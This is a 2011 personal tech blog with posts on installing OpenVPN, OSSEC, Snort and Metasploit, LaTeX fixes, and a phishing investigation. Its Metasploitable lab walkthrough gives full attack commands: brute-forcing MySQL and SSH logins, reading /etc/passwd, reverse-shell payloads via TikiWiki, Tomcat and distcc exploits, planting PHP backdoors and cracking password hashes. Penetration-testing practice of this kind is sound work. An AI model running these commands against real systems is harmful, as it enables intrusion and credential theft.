Kush, Nishchal

Installing OpenVPN 2.2 on Centos 5.7

2011-10-31T15:43:00.001+10:00

OpenVPN is an SSL based VPN. There are other VPN solutions such as IPsec, etc. but OpenVPN provides a cost effective alternative. I like OpenVPN as it support two-way authentication, i.e. both the client and server authenticate using certificates. To install OpeVPN on CentOS we need a number of cryptographic libraries. The simplest way is to use the DAG/RPMForge repository.

Set-up the RPMForge repository [1], as this contains the packages necessary for the installation and the instructions are provided below. The instructions below are just to document this specific installation and therefore this blog post is not to be misinterpreted as a best practises guide. The instructions are adapted from the OpenVPN website [2], but this blog post is intended more as a quick and dirty guide to getting OpenVPN running on CentOS 5.7. Additionally the set-up and configuration of the client is considered beyond the scope of this blog post.

Install packages

rpm -Uhv http://apt.sw.be/redhat/el5/en/i386/rpmforge/RPMS/rpmforge-release-0.3.6-1.el5.rf.i386.rpm
yum -y update
yum -y openvpn

Set-up configuration files

cd /etc/openvpn/
cp /usr/share/doc/openvpn-2.2.0/sample-config-files/server.conf .
mkdir -p /etc/openvpn/easy-rsa/keys
cd /etc/openvpn/easy-rsa
cp -rf /usr/share/doc/openvpn-2.2.0/easy-rsa/2.0/* .
chmod o+x,g+x clean-all, build-* vars whichopensslcnf pkitool inherit-inter list-crl revoke-full sign-req

Edit the PKI configuration

vi /etc/openvpn/easy-rsa/vars

Also consider setting the key length using KEY_SIZE variable, 1024 is the default 2048 is better, but slows down the TLS, but I am paranoid and use 4096 bit keys
Set the country (KEY_COUNTRY), state (KEY_PROVINCE), locality (KEY_CITY), organisation name (KEY_ORG), and support email (KEY_EMAIL)

Set-up the PKI infrastructure. This involves make a certificate authority and then generate the server certificate and any client machine certificates

Create the certificate authority

. ./vars
./clean-all
./build-ca
The CA key and certificate should not be in the keys directory inside the easy-rsa directory.

Create certificate for the server

./build-key-server NAME_OF_SERVER
Answer the questions and commit the certificate into the database

Create the Diffie Hellman files

These files are used for the actual key exchange to ensure the confidentiality over an insecure channel, aka the Internet. Based on the length of the key used (KEY_SIZE) it may take a while.
./build-dh

Create the certificate for each client

When doing this for clients, I generate one for each device a client may use, that way if a device is stolen or goes missing, I only have to revoke a single certificate and the others keep working as they do. Not sure if this a good approach, but its definitely my quick and dirty (lazy) approach.
./build-key LAPTOP
./build-key HOME-DESKTOP
./build-key PDA

Edit the server configuration file

vi /etc/openvpn/server.conf
Check/change

local
proto
dev
port
ca
cert
key
dh
max-clients
user
group
log-append
verb

Start everything

/etc/rc.d/init/openvpn start
chkconfig --level 235 openvpn on

Possible Errors:

If the OpenVPN server fails to start, ensure that logging is enabled, i.e. refer to log-append in the configuration file and examine the log. A common error is that OpenVPN fails to open certain files, check that the paths to these files are specified correctly.

References:

Installing OSSEC on Centos 5.7

2011-10-30T19:04:00.002+10:00

OSSEC is an open source host-based IDS that performs log analysis, and is able to correlate and analyse logs for a number of Linux (and Windows, but that is outside the scope of this blog post) servers. The software architecture of OSSEC and the use of agents, lends OSSEC to flexible deployment and management [1].

Set-up the Atomic repository that already has the appropriate OSSEC packages and install them would be the easiest way. However I have a strong dislike for the use of the /var partition (most system administrators, hmm... well at-least I have always, set this up as a separate partition for ease of management and security reasons) as an install location, esp. when it has been specified as a "noexec" partition.

Please Note:
Firstly, there are a number of dependencies of some of the set-up below, such as Apache, PHP, MySQL, but the installation and secure configuration of these services are beyond the scope of this blog post. Secondly, the configuration below is only to set-up OSSEC as a monitor and not run it in IPS, i.e. as an active response alert handler.

Installation using the repository

wget https://www.atomicorp.com/installers/atomic -O atomic.sh
. ./atomic.sh
yum -y update
yum -y install ossec-hids ossec-hids-server ossec-wui

Installation using the tar ball source

Download, compile and install the source

wget http://www.ossec.net/files/ossec-hids-2.6.tar.gz
tar zxvf ossec-hids-2.6.tar.gz
cd ossec-hids-2.6/src
make clean
make setdb
make all
cd ..
./install.sh

en
local
/opt/ossec
y
user@domain
mx.domain
y
y
n

Setup mysql DB for logging

Grant access to database

mysql -u root -p
grant INSERT,SELECT,UPDATE,CREATE,DELETE,EXECUTE on ossec.* to ossecuser@localhost;
set password for ossecuser@localhost=PASSWORD('PASSWD');
quit;

Create database and tables

mysqladmin -u root -p create ossec
mysql -u root -p ossec < src/os_dbd/mysql.schema

Edit the /opt/ossec/etc/ossec.conf file

Check the wiki to setup logging to the database and syslog [2]

Install the Web User Interface, you will need Apache and php

Again, the installation and secure configuration of Apache is beyond the scope of this blog post.
wget http://www.ossec.net/files/ui/ossec-wui-0.3.tar.gz
tar zxvf ossec-wui-0.3.tar.gz
mkdir -p /var/www/html/ossec-wui
cp -rf ./ossec-wui-0.3/* /var/www/html/ossec-wui/
cd /var/www/html/ossec-wui/
./setup.sh
Edit the ossec_conf.php to point to the ossec installation completed in the previous stage

$ossec_dir="/opt/ossec";

Start the OSSEC services

/opt/ossec/bin/ossec-control enable database
/opt/ossec/bin/ossec-control enable client-syslog
/opt/ossec/bin/ossec-control start

Possible Errors:

When executing OSSEC-WUI you may get a page that displays. "Unable to access OSSEC directory". Ensure that the user that your Apache web server runs as, e.g. httpd or apache is added to the ossec group

usermod -a -G ossec apache.

"Unable to retrieve alerts". Ensure that you web server is able to open the alerts file. This issue is two fold, firstly ensure that the web server has permissions to open the file and secondly that the fopen command is enabled in PHP.

safe_mode Off
safe_mode_gid On

These two are no so much error, but warning that will be annoy your syslog server, but depend on your PHP configuration.

PHP Warning: shell_exec() has been disabled for security reasons - This is because of a uname -a query in the /var/www/html/ossec-wui/lib/os_lib_agent.php script;

//$agent_list[$agent_count]{'os'} = `uname -a`;
$agent_list[$agent_count]{'os'} = "Linux";

PHP Warning: fseek() expects parameter 3 to be long - This may be a simple programming error in the /var/www/html/ossec-wui/lib/os_lib_alerts.php

//fseek($fp, $seek_place, "SEEK_SET");
fseek($fp, $seek_place );

References:

Installing Snort 2.9.1.2 on CentOS 5.7

2011-10-29T21:11:00.004+10:00

CentOS 5.7 uses an older version of libpcap (0.9.4), but Snort's Data Acquisition Library (daq) needs a newer version of libpcap (>=1.0.0). The latter is not an issue with the CentOS 6.0. Vishesh Kumar [1] provides an excellent instructions to getting Snort 2.9 to run on RHEL 5 (http://www.linuxmantra.com/2010/10/install-snort-29-on-rhel-5.html). The purpose of this post is not to duplicate his efforts, but to extend it slightly to include instructions for a complete Snort set-up.

libpcap - http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz [3]
daq : http://www.snort.org/downloads/1221 [2]
snort : http://www.snort.org/downloads/1207 [2]

Download and install the libraries and software as per the instructions below;

Enable the Extra Packaged for Enterprise Linux (EPEL) repository to enable the installation of additional packages not available under the standard repositories

rpm -Uvh http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-4.noarch.rpm
yum -y update
yum -y upgrade

Install developments to compile the libraries and source code, and additional libraries and header files that are required later on

yum -y groupinstall 'Development Tools'
yum -y install pcre-devel
yum -y install libdnet-devel
yum -y install zlib-devel
yum -y install mysql mysql-server mysql-devel mysql-bench

Download, compile and install libpcap

wget http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
cd libpcap-1.1.1
./configure --prefix=/usr
make && make install

Download, compile and install daq

wget http://www.snort.org/downloads/1221 -O daq-0.6.2.tar.gz
cd daq-0.6.2
./configure
make && make install

Download, compile and install snort

wget http://www.snort.org/downloads/1207 -O snort-2.9.1.2.tar.gz
cd snort-2.9.1.2
./configure --with-mysql
make && make install

Download, compile and install Barnyard2

wget --no-check-certificate https://github.com/firnsy/barnyard2/tarball/master -O firnsy-barnyard2-405761e.tar.gz
tar zxvf firnsy-barnyard2-405761e.tar.gz
cd firnsy-barnyard2-405761e
./autogen.sh
./configure --with-mysql
make && make install

Create the snort database on the mysql enginer

mysqladmin -u root -p create snort
mysql -u root -p -D snort < schemas/create_mysql
mysql -u root -p

GRANT CREATE,INSERT ON root.* TO snort@localhost IDENTIFIED BY 'PASSWORD';
GRANT CREATE,INSERT,SELECT,DELETE,UPDATE ON snort.* TO snort@localhost IDENTIFIED BY 'PASSWORD';

To get the current registered user rules, you need to sign up and obtain an Oinkcode. The Oinkcode will be used for downloading the rules and used with pulledpork.

Sign in or request an account from https://www.snort.org/login
Get your oinkcode after signing in from https://www.snort.org/account/oinkcode
cd etc
wget http://www.snort.org/reg-rules/snortrules-snapshot-.tar.gz/OINKCODE -O snortrules-snapshot-LATEST.tar.gz
tar zxvf snortrules-snapshot-LATEST.tar.gz

Setup the configuration and rules files for snort

mkdir -p /etc/snort
mv -f etc/* .
rmdir etc/
mv snortrules-snapshot-LATEST.tar.gz ../../
rm -f Makefile Makefile.am Makefile.in
cp -rf * /etc/snort/

Edit the snort configuration

vi /etc/snort/snort.conf

ipvar HOME_NET
var RULE_PATH rules
var SO_RULE_PATH so_rules
var PREPROC_RULE_PATH preproc_rules
output database: log, mysql, user=snort password=PASSWORD dbname=snort host=localhost
output alert_syslog: LOG_LOCAL6 LOG_ALERT

Edit the syslog.conf file to log alerts to separate file and restart the syslog daemon

Include the line in syslog.conf "local6.* /var/log/snort/alerts.log"
/etc/rc.d/init.d/syslog restart

Test the snort installation, and set-up environment to run snort if all OK

snort -c /etc/snort/snort.conf -T
useradd -G snort snort -s /bin/false
chown -R root:snort /var/log/snort
chmod -R g+w /var/log/snort

Configure barnyard [4]

mkdir -p /var/log/barnyard2
chmod 666 /var/log/barnyard2
touch /var/log/snort/barnyard2.waldo
cp etc/barnyard2.conf /etc/snort/
Edit the /etc/snort/barnyard2.conf

output database: log, mysql, user=snort password= dbname=snort host=localhost
config hostname: localhost
config interface: eth0

You can get snort to start automatically, but writing a customer script to start/stop/restart the daemon or simply kicking it off to start up when the machine boots. Edit the rc.local file and out the following in

/usr/local/bin/snort -D -u snort -g snort -c /etc/snort/snort.conf -i eth0
/usr/local/bin/barnyard2 -c /etc/snort/barnyard2.conf -d /var/log/snort -f snort.log -w /var/log/snort/barnyard2.waldo -D

Common Errors:

ERROR: parser.c(5261) Could not stat dynamic module path "/usr/local/lib/snort_dynamicrules": No such file or directory.
Fatal Error, Quitting..

mkdir -p /usr/local/lib/snort_dynamicrules
cp /etc/snort/so_rules/precompiled/DIST/i386/2.9.0.0/* /usr/local/lib/snort_dynamicrules/

ERROR: /etc/snort/rules/web-misc.rules(555) Cannot use the fast_pattern content modifier for a lone http cookie/http raw uri /http raw header /http raw cookie /status code / status msg /http method buffer content.
Fatal Error, Quitting..

The fast_pattern option cannot be used with the http_method string. Edit the web-misc.rules file and remove it from the snort rule. Do a search for "2010-0388" and remove the alert option fast_pattern from the alert rule.

ERROR: /etc/snort/snort.conf(244) => 'compress_depth' and 'decompress_depth' should be set to max in the default policy to enable 'unlimited_decompress'
Fatal Error, Quitting..

Edit the /etc/snort/snort.conf file and set the http_inspect compress_depth and decompress_depth to 65535 from 20480.

ERROR: ByteExtract variable 'bugtraq' in rule [3:13897] is used before it is defined

Ensure that the shared libraries copied above using "cp /etc/snort/so_rules/precompiled/DIST/i386/2.9.0.0/* /usr/local/lib/snort_dynamicrules/" are for the correct distribution
Ensure that the rules being used are for the version of snort being used.

Please note:

These instruction are for 32bit hardware, for 64bit machines you will need to select appropriate 64bit RPM packages or configure and compile with appropriate compiler switches. These are considered beyond the scope of this post.
All instructions are executed with root privileges.

References:

Gnu Screen

2011-10-26T17:04:00.000+10:00

Running some experiment on a VM server I rapidly ran out of patience having to wait for commands to run, and/or switching back and forth using Ctrl+Z, bg, and fg. My thoughts went back to Nick Black who had introduced me to Gnu Screen several years back, alas I has forgotten the short-cuts, Thankfully Google and the man page came to the rescue.

Since the VM server was a CentOS 6.0 box, with minimal install, I had to install Gnu Screen using;

yum -y install screen

Here's a summary of the shortcuts that may be useful;

Ctrl+A, c : create a new screen
Ctrl+A, A : set a name for the screen instead of the default shell name (bash)
Ctrl+A, " : lists the screens available
Ctrl+A, n : toggle to next screen
Ctrl+A, p : toggle to previous screen

References:

http://www.gnu.org/s/screen/

APAcite on Mac OS X (Lion) with texlive

2011-10-25T14:03:00.000+10:00

I had to recently rebuild my Mac Book Pro (gasp!), and decided to upgrade to Lion. The whole process was relatively painless. Files were copied back from backups, and updated from my SVN repositories, however I had troubles installing the appropriate Mac port package for the APACite classes.

sudo port install texlive-bibtex-extra

The latter yielded errors, which were logged in

/opt/local/var/macports/logs/_opt_local_var_macports_sources_rsync.macports.org_release_tarballs_ports_perl_p5-text-bibtex/p5.12-text-bibtex/main.log

Since the dependency p5.12-text-bibtex could not be installed, examination of the log file provided the following clues; error: 'main' must return 'int'

The same error was reported for;

/opt/local//var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_tarballs_ports_perl_p5-text-bibtex/p5.12-text-bibtex/work/Text-BibTeX-0.60/btparse/tests/namebug.c
/opt/local//var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_tarballs_ports_perl_p5-text-bibtex/p5.12-text-bibtex/work/Text-BibTeX-0.60/btparse/tests/tex_test.c

A quick rename of void to int enabled the package to be installed without further issues.

APAcite on Mac OS X with texlive

2011-10-17T10:30:00.001+10:00

While compiling a LaTeX document, a blank template of my PhD thesis to be exact, when I got the following error "! LaTeX Error: File `apacite.sty' not found." Again a quick search for Mac ports indicated that the texlive-bibtex-extra package was required. It was quickly installed using;

sudo port install texlive-bibtex-extra

Subsequent compile yielded more errors, this time it was "! Undefined control sequence. \abstract". This was solved using the texlive-latex-extra package, installed using;

sudo port install texlive-latex-extra

Then adding the following to define the abstract in the book documentclass;

% Define abstract in book documentclass
\pagestyle{empty}
\newenvironment{abstract}%
{
\onehalfspacing%
\null
\vfill
\chapter*{\centering Abstract}%
\addcontentsline{toc}{chapter}{Abstract}
}%
{\vfill\null}

% Start the actual abstract
\begin{abstract}
\end{abstract}

More errors resulted "! Use of \@year@ doesn't match its definition." I had to add "\bibliographystyle{apacite}" to the bibligraphy page, and all was well once again.

References:

https://trac.macports.org/wiki/TeXLivePackages
http://www.cs.utexas.edu/~witchel/errorclasses.html

Evernote and Nix/NeverNote on Ubuntu 10.04

2011-09-21T14:11:00.002+10:00

Evernote is a great tool. I absolutely love it. The only con, is that it's nto available natively for Linux. So I have to run it under the Windows Emulator or wine. The installation is fairly simple.

wget http://evernote.s3.amazonaws.com/win4/public/Evernote_4.5.0.5229.exe
wine Evernote_4.5.0.5229.exe

Obviously not running natively there is a slight performance lag. This may be attributed to my 5 year old laptop. Although it's still usable, the slow synchronization soon becomes tiresome. Fortunately there is a Linux native client called NeverNote[2].

sudo add-apt-repository ppa:vincent-c/nevernote
sudo apt-get update
sudo apt-get install nevernote
nixnote

NixNote is a bit ugly, but functional. Definitely faster than running Evernote in emulation. The feature that I like best is that you are able to encrypt the NixNote database using AES when you shutdown. This is a definite plus in my books.

Therefore, if you can live with the degraded performance, then Evernote will do, but if you need to work faster, want that extra bit of security, and an ugly interface does not bother you, then give NixNote (aka NeverNote) a try.

References:

http://www.howtogeek.com/howto/35661/how-to-install-evernote-4.0-in-ubuntu-using-wine/
http://www.techdrivein.com/2011/06/nevernote-open-source-evernote-clone.html

Cisco console from Ubuntu 10.04

2011-09-21T12:28:00.000+10:00

It's pretty easy to set-up Cisco serial console connectivity on Ubuntu 10.04. The usual way is to use minicom. The serial ports usually called COM1-4 usually have the following address range;

COM1 - 3E8
COM2 - 2F8
COM3 - 3E8
COM4 - 2E8

To complete the setup first determine the address used for COM1 (or whichever serial port you wish to use) on your machine query the kernel buffer ring using the dmesg command, then install and configure the minicom, modem emulation tool.

sudo dmesg | grep tty
sudo apt-get install minicom
sudo minicom -s # Configure the terminal to use 9600-8-N-1 and save as dfl
sudo minicom

References:

https://help.ubuntu.com/community/CiscoConsole
http://useopensource.blogspot.com/2007/01/using-cisco-console-in-linux.html

KeePass on Ubuntu 10.04

2011-09-20T01:17:00.000+10:00

KeePass is a very popular password management software. One of my client uses this for their systems and I was given a copy of their database. Since I mostly use linux when I am working, I needed a way to get this working on Ubuntu 10.04. Instructions are widely available, but again for my benefit, I have documented them here as step-by-step guide for myself. At the time of this blog post the 2.x version of KeePass was 2.16

Firstly install Mono. For more details refer to the Badger ports website[1].

Edit the /etc/apt/sources.list file

Add the lines

# For mono 2.6 -> needed by KeePass
deb http://badgerports.org lucid main

cd /etc/apt
sudo wget http://badgerports.org/directhex.ppa.asc
sudo apt-key add directhex.ppa.asc
sudo apt-get update
sudo apt-get install mono mono-devel
mono --version

# Confirm the mono version is >= 2.6

Download and install the KeePass from the KeePass website[2].

sudo mkdir -p /opt/KeePass2
cd /opt/KeePass2
wget http://downloads.sourceforge.net/keepass/KeePass-2.16.zip
sudo unzip KeePass-2.16.zip

Execute the KeePass application

mono /opt/KeePass2/KeePass.exe &

There does appear to be a lot of debug information (am assuming its debug information) written to the terminal, but these should be safe to ignore.

References:

http://badgerports.org
http://keepass.info

SPAM - Westpac Notice

2011-09-15T09:38:00.000+10:00

I recently got an email with the subject "[Bulk] Westpac Notice" claiming to be from "notice@westpac.com.au". I knew this was SPAM, but was curious none the less, I felt like investigating further, but didn't have much time... my curiosity got the better of me, and I decided to do some quick digging anyway.

The link on the email resolved to "http://www.backrite.com/cw3/assets/product_small/Westpac.com.au/Westpac/index.htm", I very crude attempt I thought, the least they could have done was attempt to get a domain that at least appears slightly legitimate or use a URL shortening service at least.

I fired up my debuggig VM and opened up Firefox and pasted the URL in, the site appeared to be down. This was going to be quicker than I thought. Next I examined the e-mail headers and found a number of interesting things;

iX-Apparently-To: me@me.com via 76.13.9.102; Mon, 12 Sep 2011 17:35:43 -0700
X-YahooFilteredBulk: 72.52.199.90
Received-SPF: none (domain of server22.01domain.net does not designate permitted sender hosts)
X-YMailISG: uqaL3oQWLDupZk39g7NZ_d1X.jvu2AiRfqDcSAS5WI1yggQj
qKsr_wBhJ6fOB576uyrk3sOva0uAvBRbH2D9buWQ2RMJpgB.gBvrBbexkVVz
XhkFvqbM2oAMn_GHLmNEOUb_wcs6rU031UCGN0Gc8InmvAhB8wE6ua0shbqw
gqobfvaLzFTrjLeJ03BlqKdv3L_RDh4xyyLL2saipKDl7XkbKwLizqsr4c6R
X-Originating-IP: [72.52.199.90]
Authentication-Results: mail.me.com from=westpac.com.au; domainkeys=neutral (no sig); from=westpac.com.au; dkim=neutral (no sig)
Received: from 127.0.0.1 (EHLO server22.01domain.net) (72.52.199.90)
by mail.me.com with SMTP; Mon, 12 Sep 2011 17:35:42 -0700
Received: from nobody by server22.01domain.net with local (Exim 4.69)
(envelope-from )
id 1R3GyS-0001kr-68
for me@me.com; Mon, 12 Sep 2011 20:35:40 -0400
To: me@me.com
Subject: [Bulk] Westpac Notice
X-PHP-Script: proteinat.com/store/images/tmp/z.php for 41.184.112.91
From:
Reply-To:
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id:
Date: Mon, 12 Sep 2011 20:35:40 -0400
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server22.01domain.net
X-AntiAbuse: Original Domain - me.com
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
X-AntiAbuse: Sender Address Domain - server22.01domain.net

Firstly, the originating IP did not match the server in the URL. Next the X-PHP-Script header gave an interesting clue, a copy and paste revealed another downed script, but this time the response from the server was more promising, a quick fuzz and I found "http://proteinat.com/store/images/cookie_load.php"

Which is a PHP shell called Web Shell by oRb or WSO. The running version was 2.5 which was released in June of 2011. The attacker must have exploited PHP and uploaded the file. The PHP shell allows for a console which is useful for work, e.g. creating a backdoor, as well as running exploits to escalate privileges to get root access. I have not had the chance to investigate further, but it would be interesting to determine how the hacker got in in the first place.

IEEETrans on Mac OS X with texlive

2011-09-06T10:52:00.001+10:00

While compiling a journal paper, I got the following error message "I couldn't open style file IEEEtran.bst"

The IEEETrans TeX distribution can be manullay installed by using the packages from CTAN [1] or IEEE [2]. However since I use macports, I just had to;

sudo port install texlive-publishers

References:

http://www.ctan.org/tex-archive/macros/latex/contrib/IEEEtran/
http://www.ieee.org/portal/cms_docs/pubs/transactions

Metasploitable walkthrough

2011-09-03T10:54:00.000+10:00

Note: this post will be updated when I have more time

I am sure there are plenty of metasploitable walkthroughs available, but I thought I'd chuck one up here anyway... Firstly download and unzip the metasploitable VMware image. I use virtual-box, and it works just as well. I ran my metasploitable image and BackTrack in host-only mode, so I had an isolated network to play in without damaging anything else.

For some of the brute force attacks you will need a wordlist of potential usernames and passwords. There are several free wordlists available. Kevin's Wordlist Page [2] is quite good. The generated wordlist should be sufficient for most attacks save for ones with rigorous password complexities enforced.

Note: Since this is just a demonstration/walk through, the attempts herein to circumvent the security of the host have not been throttled down to prevent detection, in fact the scans, and exploits run may be considered extremely noisy.

Discovery

Find the IP address of the metasploitable host

nmap -sn -n -T1 192.168.56.0/24

In this case the host IP was 192.168.56.101
Scan the metasploitable host to find the OS and services running on it

nmap -n -v -A -O -T1 -sS -sV 192.168.56.101
The following services were identified; 21 running ProFTPD 1.3.1, 22 running OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0), 23 running Linux telnetd, 25 running Postfix smtpd, 53 running ISC BIND 9.4.2, 80 running Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch), 139 running Samba smbd 3.X (workgroup: WORKGROUP), 445 running Samba smbd 3.X (workgroup: WORKGROUP), 3306 running MySQL 5.0.51a-3ubuntu5, 5432 running PostgreSQL DB 8.3.0 - 8.3.7, 8009 running Apache Jserv (Protocol v1.3), 8180 running Apache Tomcat/Coyote JSP engine 1.1 on Host: metasploitable.localdomain; OSs: Unix, Linux

Search the exploit DB to see if any exploits exist, and run the metasploit exploit. I have discussed these in detail below. In a majority of cases the exploits already exist in metasploit and is just a matter of selecting the correct one and specifying the correct options and parameters to them.

MySQL

The version accoring to the nmap scan was MySQL 5.0.51a-3ubuntu5
http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=mysql
Brute force the login

search mysql
use auxiliary/scanner/mysql/mysql_login
show options
set THREADS 1000 # adding the brute in brute force
set RHOST 192.168.56.101
set USERPASS_FILE /opt/msf3/demo-wordlist.txt
set STOP_ON_SUCCESS true
run

[+] 192.168.56.101:3306 - SUCCESSFUL LOGIN 'root' : 'root'
Install a mysql client locally and use the credentials to connect to the remote server and get a dump of the DB or run SQL queries, or another scanner to get the contents of /etc/passwd file to identify accounts that have shell access

back
use auxiliary/admin/mysql/mysql_sql
show options
set USERNAME root
set PASSWORD root
set RHOST 192.168.56.101
set SQL select load_file(\'/etc/passwd\')
run

You should now have the contents of the /etc/password file

TikiWiki
Using the credentials found using the brute force method above, we can connect using the mysql client, e.g. mysql -u root -p -h 192.168.56.101

Check the databases installed

show databases;

Returns the names of the databases, information_schema, mysql, tikiwiki, and tikiwiki195. Guessing from the name, it appears to be a database for a wiki application. A quick google search (http://info.tiki.org/Tiki+Wiki+CMS+Groupware) confirms this. This too is vulnerable and metasploit exploits exist.

back
use exploit/unix/webapp/tikiwiki_graph_formula_exec
show options
set RHOST 192.168.56.101
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.1
exploit

This returns the username and password used with the wiki CMS and the meterpreter interface. The meterpreter console is very powerful and extremely useful in futher analysis of the host. We may come back to the meterpreter console.
The good thing about wiki's and CMS's in general is the ability to load files onto the server. Unfortunately there are two tikiwiki databases in use. Fortunately both have the same details in their users_users table, i.e. username and password of admin and admin respectively.
There is a requirement for uploading files to the compromised machine for easier access later, i.e. a back door, refer below [3-4]. We can test the upload of a backup by creating a simple file e.g. phpinfo.php with phpinfo(); in it, and then uploading it via the backup upload and then navigating to "http://192.168.56.101/tikiwiki/backups/phpinfo.php". If you see the PHP info page, then the uploads work great and backup PHP files are interpreted by the server.
Now download a PHP shell and upload it for a shell backdoor. Here's a list of potential PHP shells;

Mysql Users

Again using the MySQL credentials, we can query the user table in the mysql database using the mysql client.

mysql -u root -proot -h 192.168.56.101
use mysql
SELECT host, user, password FROM user;

We are presented with additional users debian-sys-maint and the 41-byte hash values (*E07F0A7CCC0044345116513C989F45663C1F8347) of their password.
I tried running john the ripper on this to see if I could crack the password, it was taking too long so I gave up. However you may have better luck, esp. with rainbow tables, etc.

The username and password hash were saved in a file e.g. mysql.txt in the following format; username:password, i.e. debian-sys-maint:*E07F0A7CCC0044345116513C989F45663C1F8347
john --format=mysql-sha1 mysql.txt

We could have also copied the hash from the root account to the other accounts as we already know the root password, but the idea is to remain undetected

Apache
Port 80 has a web server running, we can connect using a browser to confirm and get a "It works!" page. To confirm the structure of the web directories we can use a fuzzer such as OWASP's DirBuster.

The initial scans should confirm the tikiwiki CMS in it's structure.

SSH
Based on the contents of the /etc/password file, we can not tweak our usernames file before trying to brute force an SSH connection.

Brute force the SSH connection, inline other attempts we don't want to stop at the first one, but get all SSH login details, Note: for this walkthrough example below, I have just used the same file, but you should specify a different user file based on the content of /etc/passwd and password file to speed things up

back
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.56.101
set THREADS 1000
set USERPASS_FILE /opt/msf3/demo-wordlist.txt
set STOP_ON_SUCCESS false
run

[+] 192.168.56.101:22 SSH - [23/30] - Success: 'user':'user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[+] 192.168.56.101:22 SSH - [28/30] - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[+] 192.168.56.101:22 SSH - [29/30] - Success: 'service':'service' 'uid=1002(service) gid=1002(service) groups=1002(service) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[+] 192.168.56.101:22 SSH - [30/30] - Success: 'postgres':'postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
Now we have shell access based on a number of logins

Tomcat

Brute force the management login

back
use auxiliary/scanner/http/tomcat_mgr_login
show options
set RHOSTS 192.168.56.101
set RPORT 8180
exploit

[+] http://192.168.56.101:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
Get shell, by exploit the host, using the weak scanned password to deploy a payload

back
use exploit/multi/http/tomcat_mgr_deploy
show options
set USERNAME tomcat
set PASSWORD tomcat
set RPORT 8180
set PAYLOAD linux/x86/shell_reverse_tcp
set STOP_ON_SUCCESS true
exploit

Should have shell now!

DistCC
This was discovered on a subsequent port scan using different paramters. Am not quote sure what it is, but there is an exploit in metasploit, and Wikipedia documentation indicated it's some sort of distributed compile for C and C++.

The number of payloads are limited for this exploit, but still allow remote shell access

back
search distcc
use exploit/unix/misc/distcc_exec
show options
set RHOST 192.168.56.101
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.56.1
exploit

Files
Here's a list of interesting files I found on the system, I hope to add more detailed descriptions and discuss their contents once I have the opportunity to investigate further.

/root/reset_logs.sh

Requirements:

Metasploit (I used Backtrack5)
nmap
Metasploitable

References:

http://www.exploit-db.com
http://wordlist.sourceforge.net/
http://www.gnucitizen.org/blog/reverse-shell-with-bash/
http://www.plenz.com/reverseshell

Metasploit presentation for CTF

2011-09-02T16:08:00.000+10:00

We had a CTF training at the labs today, where I tried to present a brief introduction to metasploit. I seriously doubt I did the tool any justice, but a colleage has requested a copy of the sides as a PDF document. I have uploaded the slides to http://www.kush.com.fj/resources/metasploit-presentation.pdf. The presentation was mostly a demo using metasploitable. ~~Perhaps in future there may be an opportunity to do a complete walk through of the metasploitable image posted here. I started~~ I started work on a metasploit walkthrough, its still incomplete but its a star. You can find the walk through here http://nkush.blogspot.com/2011/09/metasploitable-walkthrough.html

Installing Metasploit 4.0.0 on Apple Mac OS X 10.6.8

2011-09-02T00:34:00.000+10:00

The installation instructions are quite well documented on the Rapid7 documentation site[1]; But in my usual style of duplicating data on the Internet, I have documented my efforts below. The key requirements of Xcode and macports was already addressed on this particular machine :)

Note: It's important to ensure that any anti-virus (AV) software is temporarily disabled and appropriate scanning exceptions added, this is to prevent the AV from quarenteening the exploits and payloads that some with metasploit.

sudo bash
port selfupdate
port install ruby19 +nosuffix
echo $PATH # Ensure that /opt/local/bin appears before /usr/bin, else edit ~/.bash_profile file and source it; ". ~/.bash_profile" or "source ~/.bash_profile"
port install mysql5-server
gem install mysql
cd /opt
wget http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2
bunzip2 framework-4.0.0.tar.bz2
tar xvf framework-4.0.0.tar
cd msf3
svn update
ln -s /opt/msf3/msf* /opt/local/bin/

References:

https://community.rapid7.com/docs/DOC-1037
http://www.metasploit.com/download/

WikiCFP

2011-08-27T01:48:00.000+10:00

WikiCFP is a useful wiki site that collates CFP.

However am a bit disappointed that it does not automatically track to the following year for the same events, e.g. once a conference is over and the dates for the following year announced, it should link to the following years conference details, instead of manually searching for it.

There is also an iPhone Application called WikiCFP that links to the site. Although functional, the application is not very intuitive, for the relatively high price of the application I was expecting more out of it, e.g. calendar integration, etc.

Runtime on notebooks

2011-08-27T01:39:00.000+10:00

Got an Apple MacBook Pro towards the start of the year. Issue was that closing the lid only puts the machine in stand by mode which still consumes power, so I wasn't getting as long a runtime as I would on my old HP nx6120 with a travel battery.

A Google search led me to Todd Huss's[2] page below. This identified the pmset[1] command as being quite useful. I followed the instructions and now have the MacBook hibernating when I close the lid. Since then I have been asked by a number of colleagues about this, so thought I better document it here.

